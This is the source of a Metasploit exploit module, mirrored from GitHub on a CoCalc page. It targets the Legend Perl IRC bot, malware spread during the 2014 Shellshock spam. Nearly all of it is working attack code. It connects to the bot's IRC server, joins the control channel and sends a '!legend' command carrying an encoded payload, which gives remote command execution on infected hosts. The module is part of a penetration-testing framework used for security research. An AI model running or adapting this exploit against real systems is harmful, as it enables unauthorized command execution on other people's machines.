Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/legend_bot_exec.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Legend Perl IRC Bot Remote Code Execution',

16
        'Description' => %q{

17
          This module exploits a remote command execution on the Legend Perl IRC Bot.

18
          This bot has been used as a payload in the Shellshock spam last October 2014.

19
          This particular bot has functionalities like NMAP scanning, TCP, HTTP, SQL, and

20
          UDP flooding, the ability to remove system logs, and ability to gain root, and

21
          VNC scanning.

22


23
          Kevin Stevens, a Senior Threat Researcher at Damballa, has uploaded this script

24
          to VirusTotal with a md5 of 11a9f1589472efa719827079c3d13f76.

25
        },

26
        'Author' => [

27
          'Jay Turla' # msf and initial discovery

28
          # MalwareMustDie

29
        ],

30
        'License' => MSF_LICENSE,

31
        'References' => [

32
          [ 'OSVDB', '121681' ],

33
          [ 'EDB', '36836' ],

34
          [ 'URL', 'https://www.damballa.com/perlbotnado/' ],

35
          [ 'URL', 'http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html' ] # Shellshock spam October 2014 details

36
        ],

37
        'Platform' => %w{unix win},

38
        'Arch' => ARCH_CMD,

39
        'Payload' => {

40
          'Space' => 300, # According to RFC 2812, the max length message is 512, including the cr-lf

41
          'DisableNops' => true,

42
          'Compat' =>

43
                        {

44
                          'PayloadType' => 'cmd'

45
                        }

46
        },

47
        'Targets' => [

48
          [ 'Legend IRC Bot', {} ]

49
        ],

50
        'Privileged' => false,

51
        'DisclosureDate' => '2015-04-27',

52
        'DefaultTarget' => 0,

53
        'Notes' => {

54
          'Reliability' => UNKNOWN_RELIABILITY,

55
          'Stability' => UNKNOWN_STABILITY,

56
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

57
        }

58
      )

59
    )

60


61
    register_options(

62
      [

63
        Opt::RPORT(6667),

64
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),

65
        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),

66
        OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])

67
      ]

68
    )

69
  end

70


71
  def post_auth?

72
    true

73
  end

74


75
  def check

76
    connect

77


78
    res = register(sock)

79
    if res =~ /463/ || res =~ /464/

80
      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")

81
      return Exploit::CheckCode::Unknown

82
    end

83


84
    res = join(sock)

85
    if !res =~ /353/ && !res =~ /366/

86
      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")

87
      return Exploit::CheckCode::Unknown

88
    end

89


90
    quit(sock)

91
    disconnect

92


93
    if res =~ /auth/ && res =~ /logged in/

94
      Exploit::CheckCode::Vulnerable

95
    else

96
      Exploit::CheckCode::Safe

97
    end

98
  end

99


100
  def send_msg(sock, data)

101
    sock.put(data)

102
    data = ""

103
    begin

104
      read_data = sock.get_once(-1, 1)

105
      while !read_data.nil?

106
        data << read_data

107
        read_data = sock.get_once(-1, 1)

108
      end

109
    rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e

110
      elog(e)

111
    end

112


113
    data

114
  end

115


116
  def register(sock)

117
    msg = ""

118


119
    if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?

120
      msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"

121
    end

122


123
    if datastore['NICK'].length > 9

124
      nick = rand_text_alpha(9)

125
      print_error("The nick is longer than 9 characters, using #{nick}")

126
    else

127
      nick = datastore['NICK']

128
    end

129


130
    msg << "NICK #{nick}\r\n"

131
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

132


133
    send_msg(sock, msg)

134
  end

135


136
  def join(sock)

137
    join_msg = "JOIN #{datastore['CHANNEL']}\r\n"

138
    send_msg(sock, join_msg)

139
  end

140


141
  def legend_command(sock)

142
    encoded = payload.encoded

143
    command_msg = "PRIVMSG #{datastore['CHANNEL']} :!legend #{encoded}\r\n"

144
    send_msg(sock, command_msg)

145
  end

146


147
  def quit(sock)

148
    quit_msg = "QUIT :bye bye\r\n"

149
    sock.put(quit_msg)

150
  end

151


152
  def exploit

153
    connect

154


155
    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")

156
    res = register(sock)

157
    if res =~ /463/ || res =~ /464/

158
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")

159
      return

160
    end

161


162
    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")

163
    res = join(sock)

164
    if !res =~ /353/ && !res =~ /366/

165
      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")

166
      return

167
    end

168


169
    print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...")

170
    legend_command(sock)

171


172
    quit(sock)

173
    disconnect

174
  end

175
end

176


177